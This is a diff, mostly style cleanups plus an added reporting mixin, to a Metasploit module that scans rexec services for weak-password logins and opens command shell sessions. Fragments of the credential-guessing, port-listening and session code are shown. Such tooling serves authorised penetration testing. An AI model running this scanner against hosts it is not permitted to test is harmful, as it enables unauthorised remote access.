@@ -10,31 +10,32 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Scanner
   include Msf::Auxiliary::CommandShell
   include Msf::Sessions::CreateSessionOptions
+  include Msf::Auxiliary::ReportSummary
 
   def initialize
     super(
-      'Name'        => 'rexec Authentication Scanner',
+      'Name' => 'rexec Authentication Scanner',
       'Description' => %q{
           This module will test an rexec service on a range of machines and
         report successful logins.
 
         NOTE: This module requires access to bind to privileged ports (below 1024).
       },
-      'References' =>
-        [
-          [ 'CVE', '1999-0651' ],
-          [ 'CVE', '1999-0502'] # Weak password
-        ],
-      'Author'      => [ 'jduck' ],
-      'License'     => MSF_LICENSE
+      'References' => [
+        [ 'CVE', '1999-0651' ],
+        [ 'CVE', '1999-0502'] # Weak password
+      ],
+      'Author' => [ 'jduck' ],
+      'License' => MSF_LICENSE
     )
 
     register_options(
       [
         Opt::RPORT(512),
         OptBool.new('ENABLE_STDERR', [ true, 'Enables connecting the stderr port', false ]),
-        OptInt.new( 'STDERR_PORT',   [ false, 'The port to listen on for stderr', nil ])
-      ])
+        OptInt.new('STDERR_PORT', [ false, 'The port to listen on for stderr', nil ])
+      ]
+    )
   end
 
   def run_host(ip)
@@ -47,6 +48,7 @@ class MetasploitModule < Msf::Auxiliary
       if not ret
         return :abort
       end
+
       sd, stderr_port = ret
     else
       sd = stderr_port = nil
@@ -62,7 +64,6 @@ class MetasploitModule < Msf::Auxiliary
     sd.close if sd
   end
 
-
   def do_login(user, pass, sfd, stderr_port)
     vprint_status("#{target_host}:#{rport} - Attempting rexec with username:password '#{user}':'#{pass}'")
 
@@ -105,16 +106,13 @@ class MetasploitModule < Msf::Auxiliary
     return :next_user
 
   # For debugging only.
-  #rescue ::Exception
+  # rescue ::Exception
   #  print_error("#{$!}")
-  #return :abort
-
+  # return :abort
   ensure
     disconnect()
-
   end
 
-
   #
   # This is only needed by rexec so it is not in the rservices mixin
   #
@@ -128,6 +126,7 @@ class MetasploitModule < Msf::Auxiliary
       512.times {
         sd = listen_on_port(stderr_port)
         break if sd
+
         stderr_port = 1024 + rand(0x10000 - 1024)
       }
     end
@@ -142,22 +141,18 @@ class MetasploitModule < Msf::Auxiliary
     [ sd, stderr_port ]
   end
 
-
   def listen_on_port(stderr_port)
     vprint_status("Trying to listen on port #{stderr_port} ..")
     sd = nil
     begin
       sd = Rex::Socket.create_tcp_server('LocalPort' => stderr_port)
-
     rescue Rex::BindFailed
       # Ignore and try again
-
     end
 
     sd
   end
 
-
   def start_rexec_session(host, port, user, pass, proof, stderr_sock)
     service_data = {
       address: host,
